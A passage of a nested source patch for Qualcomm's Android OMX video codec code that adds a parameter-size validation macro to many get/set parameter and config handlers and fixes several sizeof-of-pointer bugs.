-     QOMX_VIDEO_HIERARCHICALCODINGTYPE eHierarchicalCodingType;
- } QOMX_VIDEO_HIERARCHICALLAYERS;
- 
--
- #ifdef __cplusplus
- }
- #endif /* __cplusplus */
-diff --git a/mm-video-v4l2/vidc/common/inc/vidc_debug.h b/mm-video-v4l2/vidc/common/inc/vidc_debug.h
-index d7a158c..0ce747c 100755
---- a/mm-video-v4l2/vidc/common/inc/vidc_debug.h
-+++ b/mm-video-v4l2/vidc/common/inc/vidc_debug.h
-@@ -1,5 +1,5 @@
- /*--------------------------------------------------------------------------
--Copyright (c) 2013, The Linux Foundation. All rights reserved.
-+Copyright (c) 2013 - 2016, The Linux Foundation. All rights reserved.
- 
- Redistribution and use in source and binary forms, with or without
- modification, are permitted provided that the following conditions are met:
-@@ -64,4 +64,15 @@
- #define DEBUG_PRINT_HIGH printf
- #endif
- 
-+#define VALIDATE_OMX_PARAM_DATA(ptr, paramType)                                \
-+    {                                                                          \
-+        if (ptr == NULL) { return OMX_ErrorBadParameter; }                     \
-+        paramType *p = reinterpret_cast<paramType *>(ptr);                     \
-+        if (p->nSize < sizeof(paramType)) {                                    \
-+            ALOGE("Insufficient object size(%u) v/s expected(%zu) for type %s",\
-+                    (unsigned int)p->nSize, sizeof(paramType), #paramType);    \
-+            return OMX_ErrorBadParameter;                                      \
-+        }                                                                      \
-+    }                                                                          \
-+
- #endif
-diff --git a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-index 19c1596..3b84707 100644
---- a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-+++ b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-@@ -2979,6 +2979,7 @@
-     }
-     switch ((unsigned long)paramIndex) {
-         case OMX_IndexParamPortDefinition: {
-+                               VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_PORTDEFINITIONTYPE);
-                                OMX_PARAM_PORTDEFINITIONTYPE *portDefn =
-                                    (OMX_PARAM_PORTDEFINITIONTYPE *) paramData;
-                                DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamPortDefinition");
-@@ -2988,23 +2989,25 @@
-                                break;
-                            }
-         case OMX_IndexParamVideoInit: {
-+                              VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
-                               OMX_PORT_PARAM_TYPE *portParamType =
-                                   (OMX_PORT_PARAM_TYPE *) paramData;
-                               DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoInit");
- 
-                               portParamType->nVersion.nVersion = OMX_SPEC_VERSION;
--                              portParamType->nSize = sizeof(portParamType);
-+                              portParamType->nSize = sizeof(OMX_PORT_PARAM_TYPE);
-                               portParamType->nPorts           = 2;
-                               portParamType->nStartPortNumber = 0;
-                               break;
-                           }
-         case OMX_IndexParamVideoPortFormat: {
-+                                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PORTFORMATTYPE);
-                                 OMX_VIDEO_PARAM_PORTFORMATTYPE *portFmt =
-                                     (OMX_VIDEO_PARAM_PORTFORMATTYPE *)paramData;
-                                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoPortFormat");
- 
-                                 portFmt->nVersion.nVersion = OMX_SPEC_VERSION;
--                                portFmt->nSize             = sizeof(portFmt);
-+                                portFmt->nSize             = sizeof(OMX_VIDEO_PARAM_PORTFORMATTYPE);
- 
-                                 if (0 == portFmt->nPortIndex) {
-                                     if (0 == portFmt->nIndex) {
-@@ -3046,22 +3049,24 @@
-                             }
-                             /*Component should support this port definition*/
-         case OMX_IndexParamAudioInit: {
-+                              VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
-                               OMX_PORT_PARAM_TYPE *audioPortParamType =
-                                   (OMX_PORT_PARAM_TYPE *) paramData;
-                               DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamAudioInit");
-                               audioPortParamType->nVersion.nVersion = OMX_SPEC_VERSION;
--                              audioPortParamType->nSize = sizeof(audioPortParamType);
-+                              audioPortParamType->nSize = sizeof(OMX_PORT_PARAM_TYPE);
-                               audioPortParamType->nPorts           = 0;
-                               audioPortParamType->nStartPortNumber = 0;
-                               break;
-                           }
-                           /*Component should support this port definition*/
-         case OMX_IndexParamImageInit: {
-+                              VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
-                               OMX_PORT_PARAM_TYPE *imagePortParamType =
-                                   (OMX_PORT_PARAM_TYPE *) paramData;
-                               DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamImageInit");
-                               imagePortParamType->nVersion.nVersion = OMX_SPEC_VERSION;
--                              imagePortParamType->nSize = sizeof(imagePortParamType);
-+                              imagePortParamType->nSize = sizeof(OMX_PORT_PARAM_TYPE);
-                               imagePortParamType->nPorts           = 0;
-                               imagePortParamType->nStartPortNumber = 0;
-                               break;
-@@ -3075,6 +3080,7 @@
-                               break;
-                           }
-         case OMX_IndexParamStandardComponentRole: {
-+                                  VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_COMPONENTROLETYPE);
-                                   OMX_PARAM_COMPONENTROLETYPE *comp_role;
-                                   comp_role = (OMX_PARAM_COMPONENTROLETYPE *) paramData;
-                                   comp_role->nVersion.nVersion = OMX_SPEC_VERSION;
-@@ -3088,22 +3094,23 @@
-                               }
-                               /* Added for parameter test */
-         case OMX_IndexParamPriorityMgmt: {
--
-+                             VALIDATE_OMX_PARAM_DATA(paramData, OMX_PRIORITYMGMTTYPE);
-                              OMX_PRIORITYMGMTTYPE *priorityMgmType =
-                                  (OMX_PRIORITYMGMTTYPE *) paramData;
-                              DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamPriorityMgmt");
-                              priorityMgmType->nVersion.nVersion = OMX_SPEC_VERSION;
--                             priorityMgmType->nSize = sizeof(priorityMgmType);
-+                             priorityMgmType->nSize = sizeof(OMX_PRIORITYMGMTTYPE);
- 
-                              break;
-                          }
-                          /* Added for parameter test */
-         case OMX_IndexParamCompBufferSupplier: {
-+                                   VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_BUFFERSUPPLIERTYPE);
-                                    OMX_PARAM_BUFFERSUPPLIERTYPE *bufferSupplierType =
-                                        (OMX_PARAM_BUFFERSUPPLIERTYPE*) paramData;
-                                    DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamCompBufferSupplier");
- 
--                                   bufferSupplierType->nSize = sizeof(bufferSupplierType);
-+                                   bufferSupplierType->nSize = sizeof(OMX_PARAM_BUFFERSUPPLIERTYPE);
-                                    bufferSupplierType->nVersion.nVersion = OMX_SPEC_VERSION;
-                                    if (0 == bufferSupplierType->nPortIndex)
-                                        bufferSupplierType->nPortIndex = OMX_BufferSupplyUnspecified;
-@@ -3141,6 +3148,7 @@
-                                break;
-                            }
-         case OMX_IndexParamVideoProfileLevelQuerySupported: {
-+                                        VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PROFILELEVELTYPE);
-                                         DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoProfileLevelQuerySupported %08x", paramIndex);
-                                         OMX_VIDEO_PARAM_PROFILELEVELTYPE *profileLevelType =
-                                             (OMX_VIDEO_PARAM_PROFILELEVELTYPE *)paramData;
-@@ -3149,6 +3157,7 @@
-                                     }
- #if defined (_ANDROID_HONEYCOMB_) || defined (_ANDROID_ICS_)
-         case OMX_GoogleAndroidIndexGetAndroidNativeBufferUsage: {
-+                                        VALIDATE_OMX_PARAM_DATA(paramData, GetAndroidNativeBufferUsageParams);
-                                         DEBUG_PRINT_LOW("get_parameter: OMX_GoogleAndroidIndexGetAndroidNativeBufferUsage");
-                                         GetAndroidNativeBufferUsageParams* nativeBuffersUsage = (GetAndroidNativeBufferUsageParams *) paramData;
-                                         if (nativeBuffersUsage->nPortIndex == OMX_CORE_OUTPUT_PORT_INDEX) {
-@@ -3172,6 +3181,7 @@
- #ifdef FLEXYUV_SUPPORTED
-         case OMX_QcomIndexFlexibleYUVDescription: {
-                 DEBUG_PRINT_LOW("get_parameter: describeColorFormat");
-+                VALIDATE_OMX_PARAM_DATA(paramData, DescribeColorFormatParams);
-                 eRet = describeColorFormat(paramData);
-                 break;
-             }
-@@ -3282,6 +3292,7 @@
-     }
-     switch ((unsigned long)paramIndex) {
-         case OMX_IndexParamPortDefinition: {
-+                               VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_PORTDEFINITIONTYPE);
-                                OMX_PARAM_PORTDEFINITIONTYPE *portDefn;
-                                portDefn = (OMX_PARAM_PORTDEFINITIONTYPE *) paramData;
-                                //TODO: Check if any allocate buffer/use buffer/useNativeBuffer has
-@@ -3525,6 +3536,7 @@
-                            }
-                            break;
-         case OMX_IndexParamVideoPortFormat: {
-+                                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PORTFORMATTYPE);
-                                 OMX_VIDEO_PARAM_PORTFORMATTYPE *portFmt =
-                                     (OMX_VIDEO_PARAM_PORTFORMATTYPE *)paramData;
-                                 int ret=0;
-@@ -3571,6 +3583,7 @@
-                             break;
- 
-         case OMX_QcomIndexPortDefn: {
-+                            VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_PARAM_PORTDEFINITIONTYPE);
-                             OMX_QCOM_PARAM_PORTDEFINITIONTYPE *portFmt =
-                                 (OMX_QCOM_PARAM_PORTDEFINITIONTYPE *) paramData;
-                             DEBUG_PRINT_LOW("set_parameter: OMX_IndexQcomParamPortDefinitionType %u",
-@@ -3617,6 +3630,7 @@
-                         break;
- 
-         case OMX_IndexParamStandardComponentRole: {
-+                                  VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_COMPONENTROLETYPE);
-                                   OMX_PARAM_COMPONENTROLETYPE *comp_role;
-                                   comp_role = (OMX_PARAM_COMPONENTROLETYPE *) paramData;
-                                   DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamStandardComponentRole %s",
-@@ -3707,6 +3721,7 @@
-                               }
- 
-         case OMX_IndexParamPriorityMgmt: {
-+                             VALIDATE_OMX_PARAM_DATA(paramData, OMX_PRIORITYMGMTTYPE);
-                              if (m_state != OMX_StateLoaded) {
-                                  DEBUG_PRINT_ERROR("Set Parameter called in Invalid State");
-                                  return OMX_ErrorIncorrectStateOperation;
-@@ -3725,6 +3740,7 @@
-                          }
- 
-         case OMX_IndexParamCompBufferSupplier: {
-+                                   VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_BUFFERSUPPLIERTYPE);
-                                    OMX_PARAM_BUFFERSUPPLIERTYPE *bufferSupplierType = (OMX_PARAM_BUFFERSUPPLIERTYPE*) paramData;
-                                    DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamCompBufferSupplier %d",
-                                            bufferSupplierType->eBufferSupplier);
-@@ -3764,6 +3780,7 @@
-                                break;
-                            }
-         case OMX_QcomIndexParamVideoDecoderPictureOrder: {
-+                                     VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_DECODER_PICTURE_ORDER);
-                                      QOMX_VIDEO_DECODER_PICTURE_ORDER *pictureOrder =
-                                          (QOMX_VIDEO_DECODER_PICTURE_ORDER *)paramData;
-                                      struct v4l2_control control;
-@@ -3789,42 +3806,52 @@
-                                      break;
-                                  }
-         case OMX_QcomIndexParamConcealMBMapExtraData:
-+                               VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
-                                      eRet = enable_extradata(VDEC_EXTRADATA_MB_ERROR_MAP, false,
-                                              ((QOMX_ENABLETYPE *)paramData)->bEnable);
-                                  break;
-         case OMX_QcomIndexParamFrameInfoExtraData:
-+                               VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
-                                        eRet = enable_extradata(OMX_FRAMEINFO_EXTRADATA, false,
-                                                ((QOMX_ENABLETYPE *)paramData)->bEnable);
-                                    break;
-         case OMX_ExtraDataFrameDimension:
-+                               VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
-                                eRet = enable_extradata(OMX_FRAMEDIMENSION_EXTRADATA, false,
-                                        ((QOMX_ENABLETYPE *)paramData)->bEnable);
-                                break;
-         case OMX_QcomIndexParamInterlaceExtraData:
-+                               VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
-                                    eRet = enable_extradata(OMX_INTERLACE_EXTRADATA, false,
-                                            ((QOMX_ENABLETYPE *)paramData)->bEnable);
-                                break;
-         case OMX_QcomIndexParamH264TimeInfo:
-+                               VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
-                                    eRet = enable_extradata(OMX_TIMEINFO_EXTRADATA, false,
-                                            ((QOMX_ENABLETYPE *)paramData)->bEnable);
-                                break;
-         case OMX_QcomIndexParamVideoFramePackingExtradata:
-+                               VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
-                                eRet = enable_extradata(OMX_FRAMEPACK_EXTRADATA, false,
-                                        ((QOMX_ENABLETYPE *)paramData)->bEnable);
-                                break;
-         case OMX_QcomIndexParamVideoQPExtraData:
-+                               VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
-                                eRet = enable_extradata(OMX_QP_EXTRADATA, false,
-                                        ((QOMX_ENABLETYPE *)paramData)->bEnable);
-                                break;
-         case OMX_QcomIndexParamVideoInputBitsInfoExtraData:
-+                               VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
-                                eRet = enable_extradata(OMX_BITSINFO_EXTRADATA, false,
-                                        ((QOMX_ENABLETYPE *)paramData)->bEnable);
-                                break;
-         case OMX_QcomIndexEnableExtnUserData:
-+                               VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
-                                 eRet = enable_extradata(OMX_EXTNUSER_EXTRADATA, false,
-                                     ((QOMX_ENABLETYPE *)paramData)->bEnable);
-                                break;
-         case OMX_QcomIndexParamMpeg2SeqDispExtraData:
-+                               VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
-                                 eRet = enable_extradata(OMX_MPEG2SEQDISP_EXTRADATA, false,
-                                     ((QOMX_ENABLETYPE *)paramData)->bEnable);
-                                 break;
-@@ -3833,6 +3860,7 @@
-                           }
-                           break;
-         case OMX_QcomIndexPlatformPvt: {
-+                               VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_PLATFORMPRIVATE_EXTN);
-                                DEBUG_PRINT_HIGH("set_parameter: OMX_QcomIndexPlatformPvt OP Port");
-                                OMX_QCOM_PLATFORMPRIVATE_EXTN* entryType = (OMX_QCOM_PLATFORMPRIVATE_EXTN *) paramData;
-                                if (entryType->type != OMX_QCOM_PLATFORM_PRIVATE_PMEM) {
-@@ -3883,6 +3911,7 @@
-                                    break;
- 
-         case OMX_QcomIndexParamIndexExtraDataType: {
-+                                    VALIDATE_OMX_PARAM_DATA(paramData, QOMX_INDEXEXTRADATATYPE);
-                                        QOMX_INDEXEXTRADATATYPE *extradataIndexType = (QOMX_INDEXEXTRADATATYPE *) paramData;
-                                        if ((extradataIndexType->nIndex == OMX_IndexParamPortDefinition) &&
-                                                (extradataIndexType->bEnabled == OMX_TRUE) &&
-@@ -3906,6 +3935,7 @@
-                                    * state. This is ANDROID architecture which is not in sync
-                                    * with openmax standard. */
-         case OMX_GoogleAndroidIndexEnableAndroidNativeBuffers: {
-+                                           VALIDATE_OMX_PARAM_DATA(paramData, EnableAndroidNativeBuffersParams);
-                                            EnableAndroidNativeBuffersParams* enableNativeBuffers = (EnableAndroidNativeBuffersParams *) paramData;
-                                            if (enableNativeBuffers) {
-                                                m_enable_android_native_buffers = enableNativeBuffers->enable;
-@@ -3922,11 +3952,13 @@
-                                        }
-                                        break;
-         case OMX_GoogleAndroidIndexUseAndroidNativeBuffer: {
-+                                       VALIDATE_OMX_PARAM_DATA(paramData, UseAndroidNativeBufferParams);
-                                        eRet = use_android_native_buffer(hComp, paramData);
-                                    }
-                                    break;
- #endif
-         case OMX_QcomIndexParamEnableTimeStampReorder: {
-+                                       VALIDATE_OMX_PARAM_DATA(paramData, QOMX_INDEXTIMESTAMPREORDER);
-                                        QOMX_INDEXTIMESTAMPREORDER *reorder = (QOMX_INDEXTIMESTAMPREORDER *)paramData;
-                                        if (drv_ctx.picture_order == (vdec_output_order)QOMX_VIDEO_DISPLAY_ORDER) {
-                                            if (reorder->bEnable == OMX_TRUE) {
-@@ -3943,6 +3975,7 @@
-                                    }
-                                    break;
-         case OMX_IndexParamVideoProfileLevelCurrent: {
-+                                     VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PROFILELEVELTYPE);
-                                      OMX_VIDEO_PARAM_PROFILELEVELTYPE* pParam =
-                                          (OMX_VIDEO_PARAM_PROFILELEVELTYPE*)paramData;
-                                      if (pParam) {
-@@ -3954,6 +3987,7 @@
-                                  }
-         case OMX_QcomIndexParamVideoMetaBufferMode:
-         {
-+            VALIDATE_OMX_PARAM_DATA(paramData, StoreMetaDataInBuffersParams);
-             StoreMetaDataInBuffersParams *metabuffer =
-                 (StoreMetaDataInBuffersParams *)paramData;
-             if (!metabuffer) {
-@@ -3996,6 +4030,7 @@
-         }
-         case OMX_QcomIndexParamVideoDownScalar:
-         {
-+            VALIDATE_OMX_PARAM_DATA(paramData, QOMX_INDEXDOWNSCALAR);
-             QOMX_INDEXDOWNSCALAR* pParam = (QOMX_INDEXDOWNSCALAR*)paramData;
-             struct v4l2_control control;
-             int rc;
-@@ -4024,6 +4059,7 @@
- #ifdef ADAPTIVE_PLAYBACK_SUPPORTED
-         case OMX_QcomIndexParamVideoAdaptivePlaybackMode:
-         {
-+            VALIDATE_OMX_PARAM_DATA(paramData, PrepareForAdaptivePlaybackParams);
-             DEBUG_PRINT_LOW("set_parameter: OMX_GoogleAndroidIndexPrepareForAdaptivePlayback");
-             PrepareForAdaptivePlaybackParams* pParams =
-                     (PrepareForAdaptivePlaybackParams *) paramData;
-@@ -4052,6 +4088,7 @@
- #endif
-         case OMX_QcomIndexParamVideoCustomBufferSize:
-         {
-+            VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_CUSTOM_BUFFERSIZE);
-             DEBUG_PRINT_LOW("set_parameter: OMX_QcomIndexParamVideoCustomBufferSize");
-             QOMX_VIDEO_CUSTOM_BUFFERSIZE* pParam = (QOMX_VIDEO_CUSTOM_BUFFERSIZE*)paramData;
-             if (pParam->nPortIndex == OMX_CORE_INPUT_PORT_INDEX) {
-@@ -4115,6 +4152,7 @@
- 
-     switch ((unsigned long)configIndex) {
-         case OMX_QcomIndexConfigInterlaced: {
-+                                VALIDATE_OMX_PARAM_DATA(configData, OMX_QCOM_CONFIG_INTERLACETYPE);
-                                 OMX_QCOM_CONFIG_INTERLACETYPE *configFmt =
-                                     (OMX_QCOM_CONFIG_INTERLACETYPE *) configData;
-                                 if (configFmt->nPortIndex == 1) {
-@@ -4140,6 +4178,7 @@
-                                 break;
-                             }
-         case OMX_QcomIndexQueryNumberOfVideoDecInstance: {
-+                                     VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_QUERY_DECODER_INSTANCES);
-                                      QOMX_VIDEO_QUERY_DECODER_INSTANCES *decoderinstances =
-                                          (QOMX_VIDEO_QUERY_DECODER_INSTANCES*)configData;
-                                      decoderinstances->nNumOfInstances = 16;
-@@ -4148,6 +4187,7 @@
-                                  }
-         case OMX_QcomIndexConfigVideoFramePackingArrangement: {
-                                           if (drv_ctx.decoder_format == VDEC_CODECTYPE_H264) {
-+                                              VALIDATE_OMX_PARAM_DATA(configData, OMX_QCOM_FRAME_PACK_ARRANGEMENT);
-                                               OMX_QCOM_FRAME_PACK_ARRANGEMENT *configFmt =
-                                                   (OMX_QCOM_FRAME_PACK_ARRANGEMENT *) configData;
-                                               memcpy(configFmt, &m_frame_pack_arrangement,
-@@ -4158,6 +4198,7 @@
-                                           break;
-                                       }
-         case OMX_IndexConfigCommonOutputCrop: {
-+                                  VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_RECTTYPE);
-                                   OMX_CONFIG_RECTTYPE *rect = (OMX_CONFIG_RECTTYPE *) configData;
-                                   memcpy(rect, &rectangle, sizeof(OMX_CONFIG_RECTTYPE));
-                                   DEBUG_PRINT_HIGH("get_config: crop info: L: %u, T: %u, R: %u, B: %u",
-@@ -4166,6 +4207,7 @@
-                                   break;
-                               }
-         case OMX_QcomIndexConfigPerfLevel: {
-+                VALIDATE_OMX_PARAM_DATA(configData, OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL);
-                 struct v4l2_control control;
-                 OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL *perf =
-                         (OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL *)configData;
-@@ -4191,7 +4233,7 @@
-                 }
- 
-                                   break;
--                              }
-+        }
-         default: {
-                  DEBUG_PRINT_ERROR("get_config: unknown param %d",configIndex);
-                  eRet = OMX_ErrorBadParameter;
-@@ -4337,6 +4379,7 @@
-         struct v4l2_control temp;
-         temp.id = V4L2_CID_MPEG_VIDC_VIDEO_STREAM_FORMAT;
- 
-+        VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_NALSIZE);
-         pNal = reinterpret_cast < OMX_VIDEO_CONFIG_NALSIZE * >(configData);
-         switch (pNal->nNaluBytes) {
-             case 0:
-@@ -8752,7 +8795,7 @@
-     }
-     DEBUG_PRINT_LOW("omx_vdec::update_portdef");
-     portDefn->nVersion.nVersion = OMX_SPEC_VERSION;
--    portDefn->nSize = sizeof(portDefn);
-+    portDefn->nSize = sizeof(OMX_PARAM_PORTDEFINITIONTYPE);
-     portDefn->eDomain    = OMX_PortDomainVideo;
-     if (drv_ctx.frame_rate.fps_denominator > 0)
-         portDefn->format.video.xFramerate = (drv_ctx.frame_rate.fps_numerator /
-diff --git a/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp b/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp
-index 7f0482f..1aee2c1 100644
---- a/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp
-+++ b/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp
-@@ -84,6 +84,8 @@
- 
- typedef struct OMXComponentCapabilityFlagsType {
-     ////////////////// OMX COMPONENT CAPABILITY RELATED MEMBERS
-+    OMX_U32 nSize;
-+    OMX_VERSIONTYPE nVersion;
-     OMX_BOOL iIsOMXComponentMultiThreaded;
-     OMX_BOOL iOMXComponentSupportsExternalOutputBufferAlloc;
-     OMX_BOOL iOMXComponentSupportsExternalInputBufferAlloc;
-@@ -1443,6 +1445,7 @@
-     switch ((int)paramIndex) {
-         case OMX_IndexParamPortDefinition:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_PORTDEFINITIONTYPE);
-                 OMX_PARAM_PORTDEFINITIONTYPE *portDefn;
-                 portDefn = (OMX_PARAM_PORTDEFINITIONTYPE *) paramData;
- 
-@@ -1484,6 +1487,7 @@
-             }
-         case OMX_IndexParamVideoInit:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
-                 OMX_PORT_PARAM_TYPE *portParamType =
-                     (OMX_PORT_PARAM_TYPE *) paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoInit");
-@@ -1493,6 +1497,7 @@
-             }
-         case OMX_IndexParamVideoPortFormat:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PORTFORMATTYPE);
-                 OMX_VIDEO_PARAM_PORTFORMATTYPE *portFmt =
-                     (OMX_VIDEO_PARAM_PORTFORMATTYPE *)paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoPortFormat");
-@@ -1527,6 +1532,7 @@
-             }
-         case OMX_IndexParamVideoBitrate:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_BITRATETYPE);
-                 OMX_VIDEO_PARAM_BITRATETYPE* pParam = (OMX_VIDEO_PARAM_BITRATETYPE*)paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoBitrate");
- 
-@@ -1541,6 +1547,7 @@
-             }
-         case OMX_IndexParamVideoMpeg4:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_MPEG4TYPE);
-                 OMX_VIDEO_PARAM_MPEG4TYPE* pParam = (OMX_VIDEO_PARAM_MPEG4TYPE*)paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoMpeg4");
-                 memcpy(pParam, &m_sParamMPEG4, sizeof(m_sParamMPEG4));
-@@ -1548,6 +1555,7 @@
-             }
-         case OMX_IndexParamVideoH263:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_H263TYPE);
-                 OMX_VIDEO_PARAM_H263TYPE* pParam = (OMX_VIDEO_PARAM_H263TYPE*)paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoH263");
-                 memcpy(pParam, &m_sParamH263, sizeof(m_sParamH263));
-@@ -1555,6 +1563,7 @@
-             }
-         case OMX_IndexParamVideoAvc:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_AVCTYPE);
-                 OMX_VIDEO_PARAM_AVCTYPE* pParam = (OMX_VIDEO_PARAM_AVCTYPE*)paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoAvc");
-                 memcpy(pParam, &m_sParamAVC, sizeof(m_sParamAVC));
-@@ -1562,6 +1571,7 @@
-             }
-         case (OMX_INDEXTYPE)OMX_IndexParamVideoVp8:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_VP8TYPE);
-                 OMX_VIDEO_PARAM_VP8TYPE* pParam = (OMX_VIDEO_PARAM_VP8TYPE*)paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoVp8");
-                 memcpy(pParam, &m_sParamVP8, sizeof(m_sParamVP8));
-@@ -1569,6 +1579,7 @@
-             }
-         case (OMX_INDEXTYPE)OMX_IndexParamVideoHevc:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_HEVCTYPE);
-                 OMX_VIDEO_PARAM_HEVCTYPE* pParam = (OMX_VIDEO_PARAM_HEVCTYPE*)paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoHevc");
-                 memcpy(pParam, &m_sParamHEVC, sizeof(m_sParamHEVC));
-@@ -1576,6 +1587,7 @@
-             }
-         case OMX_IndexParamVideoProfileLevelQuerySupported:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PROFILELEVELTYPE);
-                 OMX_VIDEO_PARAM_PROFILELEVELTYPE* pParam = (OMX_VIDEO_PARAM_PROFILELEVELTYPE*)paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoProfileLevelQuerySupported");
-                 eRet = get_supported_profile_level(pParam);
-@@ -1586,6 +1598,7 @@
-             }
-         case OMX_IndexParamVideoProfileLevelCurrent:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PROFILELEVELTYPE);
-                 OMX_VIDEO_PARAM_PROFILELEVELTYPE* pParam = (OMX_VIDEO_PARAM_PROFILELEVELTYPE*)paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoProfileLevelCurrent");
-                 memcpy(pParam, &m_sParamProfileLevel, sizeof(m_sParamProfileLevel));
-@@ -1594,6 +1607,7 @@
-             /*Component should support this port definition*/
-         case OMX_IndexParamAudioInit:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
-                 OMX_PORT_PARAM_TYPE *audioPortParamType = (OMX_PORT_PARAM_TYPE *) paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamAudioInit");
-                 memcpy(audioPortParamType, &m_sPortParam_audio, sizeof(m_sPortParam_audio));
-@@ -1602,6 +1616,7 @@
-             /*Component should support this port definition*/
-         case OMX_IndexParamImageInit:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
-                 OMX_PORT_PARAM_TYPE *imagePortParamType = (OMX_PORT_PARAM_TYPE *) paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamImageInit");
-                 memcpy(imagePortParamType, &m_sPortParam_img, sizeof(m_sPortParam_img));
-@@ -1617,6 +1632,7 @@
-             }
-         case OMX_IndexParamStandardComponentRole:
-             {
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_COMPONENTROLETYPE);
-                 OMX_PARAM_COMPONENTROLETYPE *comp_role;
-                 comp_role = (OMX_PARAM_COMPONENTROLETYPE *) paramData;
-                 comp_role->nVersion.nVersion = OMX_SPEC_VERSION;
-@@ -1629,7 +1645,7 @@
-             /* Added for parameter test */
-         case OMX_IndexParamPriorityMgmt:
-             {
--
-+                VALIDATE_OMX_PARAM_DATA(paramData, OMX_PRIORITYMGMTTYPE);
-                 OMX_PRIORITYMGMTTYPE *priorityMgmType = (OMX_PRIORITYMGMTTYPE *) paramData;
-                 DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamPriorityMgmt");
-                 memcpy(priorityMgmType, &m_sPriorityMgmt, sizeof(m_sPriorityMgmt));
-@@ -1638,6 +1654,7 @@
-             /* Added for parameter test */
-         case OMX_IndexParamCompBufferSupplier:
-             {
